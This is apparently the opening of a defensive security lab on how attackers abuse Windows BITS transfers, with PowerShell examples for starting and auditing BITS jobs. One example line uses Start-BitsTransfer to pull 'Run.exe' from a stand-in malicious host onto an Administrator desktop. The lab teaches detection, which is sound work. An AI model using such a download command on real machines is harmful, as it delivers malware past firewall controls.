powershell
Windows includes command line tools to support users transferring files with BITS. While BITSAdmin is now deprecated, BITS PowerShell cmdlets can be used to perform many of the same tasks. An example of a PowerShell command to start a BITS transfer job is shown below.
Start-BitsTransfer -Source http://MyNastyServer.net/m4lw4r3/Run.exe -Destination C:\users\Administrator\Desktop\Run.exe
Another useful command is Get-BitsTransfer. This can be used when attempting to identify harmful or unwanted file transfers. The example below can be used to get detailed information relating to all BITS jobs, including jobs owned by the System.
Get-BitsTransfer -AllUsers | select *
More information on the BITS cmdlets can be found using the following link.
abuse
The features that make BITS a discrete mechanism for transferring legitimate data also make it an ideal candidate for copying malicious files. Furthermore, as BITS is primarily used for Windows updates, it is available across a wide range of Windows machines and able to bypass firewall restrictions.
BITS has been used in a range of different attacks – known to date back to 2007 – which have become more sophisticated over time. In 2016, the SecureWorks® Counter Threat Unit™ identified malware-related network alerts, after the malware in question had been removed from the compromised system. They discovered that as well as creating BITS jobs, the malware also took advantage of the BITS notification feature, enabling it to download-and-execute after the original malware had been removed by antivirus software. More information can be found in the following blog post.
In this lab you will need to use the PowerShell cmdlets to review a number of BITS jobs. You will need to answer a series of questions based on this information.
Informative Alert
In order to review all of the BITS transfers, it may be necessary to run PowerShell as an administrator. You can do this by right-clicking on the PowerShell icon and selecting the appropriate option.